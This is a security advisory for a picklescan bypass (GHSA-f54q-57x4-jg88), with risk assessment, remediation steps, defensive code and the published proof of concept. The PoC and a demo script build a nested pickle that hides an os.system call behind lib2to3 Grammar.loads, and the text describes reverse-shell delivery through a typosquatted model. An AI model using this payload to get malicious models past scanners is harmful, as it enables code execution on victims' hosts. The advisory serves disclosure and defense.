GHSA-f54q-57x4-jg88: picklescan: scanner bypass enables RCE in ML models

GHSA-f54q-57x4-jg88 MEDIUM
Published August 26, 2025
CISO Take

If your ML pipeline uses picklescan to gate model loading, that control is broken: attackers can craft pickle payloads that pass the scan cleanly and execute arbitrary code on load. Update picklescan to 0.0.29 or later immediately and treat any model scanned with a prior version as untrusted. Implement defense in depth: picklescan alone was never sufficient as a trust boundary for model files.

Risk Assessment

HIGH for organizations that rely on picklescan as their primary or sole defense before loading pickle-based ML models. The vulnerability is trivially exploitable post-disclosure: the PoC is public and requires no special ML knowledge. The blast radius extends beyond individual deployments, since any CI/CD pipeline, model registry, or data science workflow that gates third-party or community models on a picklescan pass is exposed. The false sense of security created by a bypassed scanner is arguably more dangerous than having no scanner at all.

Affected Systems

Package Ecosystem Vulnerable Range Patched
picklescan pip < 0.0.29 0.0.29

Do you use picklescan? You're affected.
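A quick way to confirm whether an environment is in scope is to compare the installed picklescan version against the patched release. This is a minimal stdlib-only sketch; the `is_patched` helper is illustrative (and assumes plain `X.Y.Z` version strings), not part of picklescan itself.

```python
from importlib import metadata

PATCHED = (0, 0, 29)  # first fixed release per this advisory

def is_patched(version: str) -> bool:
    """Return True if a picklescan version string is >= 0.0.29."""
    # Assumes simple numeric versions like "0.0.28"; pre-release
    # suffixes would need a real version parser (e.g. packaging).
    parts = tuple(int(p) for p in version.split(".")[:3])
    return parts >= PATCHED

try:
    installed = metadata.version("picklescan")
    status = "patched" if is_patched(installed) else "VULNERABLE - upgrade now"
    print(f"picklescan {installed}: {status}")
except metadata.PackageNotFoundError:
    print("picklescan is not installed in this environment")
```

Run this in every environment listed in the remediation steps (dev, CI/CD, staging, production), since a single unpatched scanner in the chain defeats the gate.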

Severity & Risk

CVSS 3.1
N/A
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Trivial

Recommended Action

6 steps
  1. PATCH

    Upgrade picklescan to >= 0.0.29 immediately across all environments — dev, CI/CD, staging, production.

  2. AUDIT

    Review model loading logs for recently ingested pickle files that were scanned with prior versions; treat them as potentially compromised.

  3. QUARANTINE

    Do not load previously scanned models from untrusted or community sources until rescanned with the patched version.

  4. DEFENSE-IN-DEPTH

    Do not rely solely on picklescan; layer with: (a) loading models in isolated containers/sandboxes, (b) preferring the safetensors format over pickle where possible, (c) pinning model hashes and verifying provenance.

  5. DETECT

    Monitor for anomalous subprocess spawning or network calls originating from Python model-loading processes — RCE payloads typically execute shell commands or initiate outbound connections.

  6. POLICY

    Enforce that models loaded from public registries (Hugging Face, etc.) must use safetensors format for production workloads.
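One defense-in-depth layer from step 4 can live in code: a restricted unpickler that resolves only an explicit allowlist of globals, so anything else, including `lib2to3.pgen2.grammar.Grammar.loads`, is rejected at load time. This is a sketch, not a complete sandbox; the allowlist shown is illustrative, and it must never include any callable that can itself deserialize data or execute commands, or the nested-payload trick described in this advisory reappears.

```python
import io
import pickle

# Illustrative allowlist; extend it to the exact classes your models need,
# never to loaders or exec-capable callables.
ALLOWED = {
    ("collections", "OrderedDict"),
}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(
            f"blocked global during model load: {module}.{name}"
        )

def safe_loads(data: bytes):
    """Deserialize pickle bytes, permitting only allowlisted globals."""
    return RestrictedUnpickler(io.BytesIO(data)).load()

# A benign object round-trips; anything referencing os.system is rejected.
from collections import OrderedDict
print(safe_loads(pickle.dumps(OrderedDict(a=1))))
```

This follows the restriction mechanism documented for the stdlib `pickle` module; it complements, rather than replaces, sandboxed loading and the safetensors policy above.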

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
Article 9 - Risk management system
ISO 42001
A.6.2.6 - Security of AI system
A.8.1 - AI supply chain management
NIST AI RMF
GOVERN 1.7 - Processes and procedures for decommissioning AI
MANAGE 2.2 - Mechanisms to sustain the value of deployed AI
OWASP LLM Top 10
LLM05:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is GHSA-f54q-57x4-jg88?

GHSA-f54q-57x4-jg88 is a scanner-bypass vulnerability in picklescan. If your ML pipeline uses picklescan to gate model loading, that control is broken: attackers can craft pickle payloads that pass the scan cleanly and execute arbitrary code on load. Update picklescan to 0.0.29 or later immediately and treat any model scanned with a prior version as untrusted. Implement defense in depth: picklescan alone was never sufficient as a trust boundary for model files.

Is GHSA-f54q-57x4-jg88 actively exploited?

No confirmed active exploitation of GHSA-f54q-57x4-jg88 has been reported, but organizations should still patch proactively.

How to fix GHSA-f54q-57x4-jg88?

1. PATCH: Upgrade picklescan to >= 0.0.29 immediately across all environments: dev, CI/CD, staging, production.
2. AUDIT: Review model loading logs for recently ingested pickle files that were scanned with prior versions; treat them as potentially compromised.
3. QUARANTINE: Do not load previously scanned models from untrusted or community sources until rescanned with the patched version.
4. DEFENSE-IN-DEPTH: Do not rely solely on picklescan; layer with: (a) loading models in isolated containers/sandboxes, (b) preferring the safetensors format over pickle where possible, (c) pinning model hashes and verifying provenance.
5. DETECT: Monitor for anomalous subprocess spawning or network calls originating from Python model-loading processes; RCE payloads typically execute shell commands or initiate outbound connections.
6. POLICY: Enforce that models loaded from public registries (Hugging Face, etc.) use the safetensors format for production workloads.

What systems are affected by GHSA-f54q-57x4-jg88?

This vulnerability affects the following AI/ML architecture patterns: model serving, training pipelines, ML model registries, MLOps CI/CD pipelines, data science notebooks.

What is the CVSS score for GHSA-f54q-57x4-jg88?

No CVSS score has been assigned yet.

Technical Details

NVD Description

Summary

The bypass abuses lib2to3.pgen2.grammar.Grammar.loads, a Python standard-library function, to execute a nested malicious pickle file.

Details

The attack proceeds in two steps. First, the attacker crafts a payload whose __reduce__ method returns a call to lib2to3.pgen2.grammar.Grammar.loads with an inner malicious pickle as its argument. Picklescan inspects the outer pickle, detects no dangerous functions, and reports it as safe. When the victim then calls pickle.load() on the file, Grammar.loads deserializes the inner payload, leading to remote code execution.

PoC

```
import pickle

class Evil:
    def __reduce__(self):
        import os
        return (os.system, ('whoami',))

class EvilLib2to3Pgen2GrammarLoads:
    def __reduce__(self):
        from lib2to3.pgen2.grammar import Grammar
        payload = pickle.dumps(Evil())
        # payload = b'\x80\x04\x95!\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x06whoami\x94\x85\x94R\x94.'
        return Grammar().loads, (payload,)
```

Impact

Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.

What is the impact? Attackers can embed malicious code in a pickle file that remains undetected by the scanner but executes when the file is loaded. Supply chain attack: attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.

Credits

https://github.com/FredericDT
https://github.com/Qhaoduoyu
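The mechanism generalizes beyond Grammar.loads: an opcode-level scanner only sees the globals referenced by the outer pickle, while the real payload travels as an opaque bytes argument. The sketch below uses pickle.loads as a stand-in for Grammar().loads (nothing is ever executed) and walks the opcode streams with the stdlib's pickletools to show the difference in what a scanner sees.

```python
import pickle
import pickletools

class Inner:
    def __reduce__(self):
        import os
        # Built only so its serialized bytes can be inspected; never loaded.
        return (os.system, ("whoami",))

inner_payload = pickle.dumps(Inner())

class Outer:
    def __reduce__(self):
        # Stand-in for Grammar().loads: any allow-listed callable that
        # deserializes its argument yields the same two-stage structure.
        return (pickle.loads, (inner_payload,))

outer_payload = pickle.dumps(Outer())

def global_refs(data: bytes):
    """Approximate what an opcode-level scanner sees: (module, name) pairs."""
    refs, strings = [], []
    for op, arg, _ in pickletools.genops(data):
        if op.name in ("SHORT_BINUNICODE", "BINUNICODE", "UNICODE"):
            strings.append(arg)
        elif op.name == "GLOBAL":            # protocols <= 3
            refs.append(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL":      # protocols >= 4
            refs.append((strings[-2], strings[-1]))
    return refs

print("inner:", global_refs(inner_payload))   # exposes the system call
print("outer:", global_refs(outer_payload))   # only the loader is visible
```

The inner payload plainly references os.system, but the outer pickle, the only thing a naive scanner examines, references nothing more suspicious than a deserialization helper.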

Exploitation Scenario

An adversary targets an organization that uses picklescan to vet PyTorch models before deploying them to a model-serving endpoint. The attacker crafts a malicious .pt file where the serialized object's __reduce__ method invokes Grammar.loads wrapping an inner pickle payload that calls os.system or subprocess. The outer picklescan check sees only a call to a standard lib2to3 stdlib function and raises no alert. The attacker publishes this file to Hugging Face under a popular model namespace (typosquatting or compromising an existing account). A data scientist on the victim's team pulls the model, runs the organization's standard picklescan validation, sees a clean result, and loads it into their training pipeline. At pickle.load() time, the inner payload executes — delivering a reverse shell or establishing persistence on the ML training host, which typically has broad access to training data, cloud credentials, and production model registries.
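At the host level, the detection step above is EDR or eBPF territory, but inside a Python model-loading process the stdlib's sys.addaudithook can catch exactly this class of payload at the moment it fires. A minimal in-process sketch follows; the blocked-event set is illustrative, and note that audit hooks cannot be removed once installed.

```python
import pickle
import sys

# Illustrative set of CPython audit events typical RCE payloads trigger.
BLOCKED_EVENTS = {"os.system", "subprocess.Popen", "os.exec"}

def install_load_guard():
    def hook(event, args):
        if event in BLOCKED_EVENTS:
            # Raising inside an audit hook aborts the audited operation,
            # so the shell command never actually runs.
            raise RuntimeError(f"blocked during model load: {event}")
    sys.addaudithook(hook)

class Evil:
    def __reduce__(self):
        import os
        return (os.system, ("whoami",))

install_load_guard()
try:
    pickle.loads(pickle.dumps(Evil()))  # payload fires at load time...
except RuntimeError as exc:
    print("caught:", exc)               # ...and the hook stops it
```

This blocks as well as detects, which is usually what you want on a training host; for pure telemetry, the hook could log the event and offending stack instead of raising.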

Timeline

Published
August 26, 2025
Last Modified
August 26, 2025
First Seen
March 24, 2026

Related Vulnerabilities